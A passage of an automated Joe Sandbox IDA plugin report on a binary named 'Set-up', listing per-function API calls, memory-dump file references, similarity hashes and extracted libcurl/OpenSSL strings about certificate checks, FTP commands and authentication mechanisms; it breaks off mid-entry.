                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000F), ref: 008B93C3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: AdaptersAddressesgetenv$Openmemcpy
                            • String ID:
                            • API String ID: 1905038125-0
                            • Opcode ID: 7ee6c6c7a25f6438dbf64c27108be7382d85b42e97bc443f9162898e73fdbf1a
                            • Instruction ID: 00db2e0b4725cb8ef9c8cc9e56c7ea9da659cbcc25b442a2242c78680dbeb448
                            • Opcode Fuzzy Hash: 7ee6c6c7a25f6438dbf64c27108be7382d85b42e97bc443f9162898e73fdbf1a
                            • Instruction Fuzzy Hash: DB51A071904302ABD714DF25D985BAABBE0FF98354F08052CF989D2761E731E865CB83
                            APIs
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(009B72D8,00000000,?,?,009B72D8,00000001,00000000,00000000,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000), ref: 009DC9FA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: malloc
                            • String ID:
                            • API String ID: 2803490479-0
                            • Opcode ID: 4b61db7c62ad0173e3f5e236331c800b014b9ea971895db9147449cb7250d83f
                            • Instruction ID: f6c461f9f9621e2d4c2b5e5a7538447c8610bf549001c471f0d493330844d419
                            • Opcode Fuzzy Hash: 4b61db7c62ad0173e3f5e236331c800b014b9ea971895db9147449cb7250d83f
                            • Instruction Fuzzy Hash: B7012BE234634227D620A6F57C86F8B57CD8BD1734F180437F944D2342D6959858C272
                            APIs
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00C932B0,?,?,?,?,?,00C92C31), ref: 00C98271
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: b6d5a9f585fa3189ad274739540e8b5b277fbfcf119cf5520e18d3d34147108a
                            • Instruction ID: 03070abd870d33723ecb1449396993be71797e14c8e58c75c95cab57b06a9ae4
                            • Opcode Fuzzy Hash: b6d5a9f585fa3189ad274739540e8b5b277fbfcf119cf5520e18d3d34147108a
                            • Instruction Fuzzy Hash: 56D0A9B19047048BCB00BFA888C140A33E8BBA5314FC406ECED841B202EB399A18C7C2
                            APIs
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,009B7254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,009B40BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009DCBD2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: 9d609a74fcedf90792147ca3cb2e70398825d5edfd1f5f2803843c158542cadd
                            • Instruction ID: 040345917b0f3edd4a78140ec074391b397742ac70c5830c268c35595fc3f4b9
                            • Opcode Fuzzy Hash: 9d609a74fcedf90792147ca3cb2e70398825d5edfd1f5f2803843c158542cadd
                            • Instruction Fuzzy Hash: 8BB022A20802008BE2022220BA8382A32A2E280300FE08833F000C02B2C328CC00E202
                            APIs
                            • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Unknown error), ref: 00876E74
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00876F8A
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00877184
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00877263
                            • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 008775B8
                              • Part of subcall function 009CF870: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000800), ref: 009CF8AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpy$memcmpmemsetstrcpystrlen
                            • String ID: Unable to load public key$ Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s$ SSL certificate issuer check ok (%s)$ SSL certificate verify ok.$ SSL certificate verify result: %s (%ld), continuing anyway.$ common name: %s (matched)$ expire date: %.*s$ issuer: %s$ start date: %.*s$ subject: %s$ subjectAltName does not match %s %s$ subjectAltName: host "%s" matched cert's "%s"$ subjectAltName: host "%s" matched cert's IP address!$%02x$%02x:$%lx$%s certificate:$%s/%s$/%s$: $<$BIO_new return NULL, OpenSSL error %s$BIO_new_mem_buf NULL, OpenSSL error %s$Cert$Could not find certificate ID in OCSP response$Could not get peer certificate chain$Error computing OCSP ID$Error getting peer certificate$Expire date$Invalid OCSP response$Invalid OCSP response status: %s (%d)$Issuer$No OCSP response received$No error$OCSP response has expired$OCSP response verification failed$OpenSSL$Proxy$Public Key Algorithm$RSA Public Key$Remove session ID again from cache$SSL certificate revocation reason: %s (%d)$SSL certificate status: %s (%d)$SSL certificate verify result: %s (%ld)$SSL: Certificate issuer check failed (%s)$SSL: Unable to open issuer cert (%s)$SSL: Unable to read issuer cert (%s)$SSL: certificate subject name '%s' does not match target hostname '%s'$SSL: could not get X509-issuer name$SSL: could not get peer certificate$SSL: illegal cert name field$SSL: no alternative certificate subject name matches target %s '%s'$SSL: public key does not match pinned public key$SSL: unable to obtain common name from peer certificate$Serial Number$Server$Signature$Signature Algorithm$Start date$Subject$Unknown error$Version$[NONE]$dsa$hostname$ipv4 address$ipv6 address$pqg$pub_key$rsa$unexpected ssl peer type: %d$vtls/openssl.c
                            • API String ID: 838718518-248801092
                            • Opcode ID: a124f9134ef52feb7ca31ed8e4e7acaa8f3081e823bc935e239b5048f25398c3
                            • Instruction ID: 0fe65ffdc9975985e34cf558f40b5f22332fe5af39cc53826770dcc43e7f78a9
                            • Opcode Fuzzy Hash: a124f9134ef52feb7ca31ed8e4e7acaa8f3081e823bc935e239b5048f25398c3
                            • Instruction Fuzzy Hash: 2C03D6B6A083446BE720AB10AD42B7B7698FF91708F088438FD4DA6257F771E954C793
                            APIs
                            • localeconv.MSVCRT ref: 00B8E0B3
                            • localeconv.MSVCRT ref: 00B8E0BE
                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00B8E149
                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00B8E179
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00B8E1D8
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00B8E1FA
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00B8E20F
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B8F886
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: free$isspacelocaleconv$_errno
                            • String ID: $d$nil)
                            • API String ID: 577766270-394766432
                            • Opcode ID: 0127d8719aa5fd9127262ba43b24c2be0daeb2e74186e9fb90f32af2b7d9d853
                            • Instruction ID: e550f8b69148920785624591448f18f05b8c7b8abcec79e5e42a7d8aa6c86c6a
                            • Opcode Fuzzy Hash: 0127d8719aa5fd9127262ba43b24c2be0daeb2e74186e9fb90f32af2b7d9d853
                            • Instruction Fuzzy Hash: 83136B706083428FD720EF28C08462ABBE1FFD9354F6449ADE9A59B361D771ED45CB82
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$???$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$LIST$NLST$PORT$PRET$PRET %s$PRET RETR %s$PRET STOR %s$REST %d$RETR_PREQUOTE$STOP$[%s] -> [%s]$[%s] ftp_state_use_port(), listening on %d$[%s] ftp_state_use_port(), opened socket$[%s] ftp_state_use_port(), socket bound to port %d$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                            • API String ID: 0-1921080684
                            • Opcode ID: fce6c098722690285d07e072540281a2713bdaa5a4e8dc8f56326b4c39de106d
                            • Instruction ID: d7bb38510c280de1d74863d5b5161d26c9b8c5605344cd75f510e3f7c7c3347f
                            • Opcode Fuzzy Hash: fce6c098722690285d07e072540281a2713bdaa5a4e8dc8f56326b4c39de106d
                            • Instruction Fuzzy Hash: BF52D071A04308ABD724DB28DC85B7B7BE9FF94308F084869F985D7292E770D945C7A2
                            APIs
                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 0080E6F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: fputc
                            • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                            • API String ID: 1992160199-2555271450
                            • Opcode ID: c29a08fd9f83a87f7d347c821b7704ee557bdf5f126d35c9037b4c97df3d17ae
                            • Instruction ID: e31d0b1733c56e1de1deb779501a5ba822b62a617d77be626263c369bb3bd2ac
                            • Opcode Fuzzy Hash: c29a08fd9f83a87f7d347c821b7704ee557bdf5f126d35c9037b4c97df3d17ae
                            • Instruction Fuzzy Hash: 9C826B71A087419FD764CE29C88072BBBE1FF85324F148A6DF9A9D72D2D730D8458B92
                            APIs
                            • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(008628ED,OAUTHBEARER,0000000B,0000000100000001,-00000007,FFFFFFFC,008628ED,-00000007,FFFFFFFC,?), ref: 00886C6D
                            • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(008628ED,SCRAM-SHA-1,0000000B,-00000007,FFFFFFFC,?), ref: 00886C85
                            • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(008628ED,SCRAM-SHA-256,0000000D,?,?,?,-00000007,FFFFFFFC,?), ref: 00886CA6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcmp
                            • String ID: -MD5$-MD5$CRAM$CRAM$DIGEST-MD5$EXTE$EXTE$GSSA$GSSA$LOGI$LOGI$NTLM$NTLM$NTLM$NTLM$OAUTHBEARER$PLAI$PLAI$RNAL$RNAL$SCRAM-SHA-1$SCRAM-SHA-256$UTH2$UTH2$XOAU$XOAU
                            • API String ID: 1475443563-2304668386
                            • Opcode ID: 371f62beaa62ca9dc0f0432b9b34904ea994f7ba671decbc6cd703efd31a178b
                            • Instruction ID: f198b0c53cc87abb7fdc3d6ca34ed287f81082ec4a6f63192e8ded0be7a33f75
                            • Opcode Fuzzy Hash: 371f62beaa62ca9dc0f0432b9b34904ea994f7ba671decbc6cd703efd31a178b
                            • Instruction Fuzzy Hash: 2202275920461543DE35252C88A07FA27E3EF433707794776E4BAC62F0F619C9ABAB13
                            APIs
                              • Part of subcall function 0081D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,008101B1), ref: 0081D8E2
                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 008152A5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: CounterPerformanceQueryfflush
                            • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                            • API String ID: 1125614567-122532811
                            • Opcode ID: d4f9350f7ef9ec516afc93e40b63cf69e7e5560a4db655bab018e354035f2698
                            • Instruction ID: 3f820513658bf25db13e0507addc9510ba3bf59e302dd4845984be226545da79
                            • Opcode Fuzzy Hash: d4f9350f7ef9ec516afc93e40b63cf69e7e5560a4db655bab018e354035f2698
                            • Instruction Fuzzy Hash: E342E471B08700AFD7189E28CC91BABB6EAFFC4704F048A2DF55997291D775AC448B92
                            APIs
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000040), ref: 00A90374
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000080), ref: 00A90395
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008), ref: 00A9049D
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000004), ref: 00A904E7
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?), ref: 00A9055F
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000298,?,?), ref: 00A9057A
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00A90618
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,0000005C,?), ref: 00A906E3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpymemset
                            • String ID: @$MD5$SHA1$SHA2-224$SHA2-256$SHA2-384$SHA2-512
                            • API String ID: 1297977491-3776850024
                            • Opcode ID: 78c3099fcd9ce29fe96d6f5d6230235e90eb91a3b40f1a46566e438b7b6d0cd4
                            • Instruction ID: 5c94e5341515577d1ef352105d194faadd1f5adcdd2d023c1bb02dad0bf3fc2b
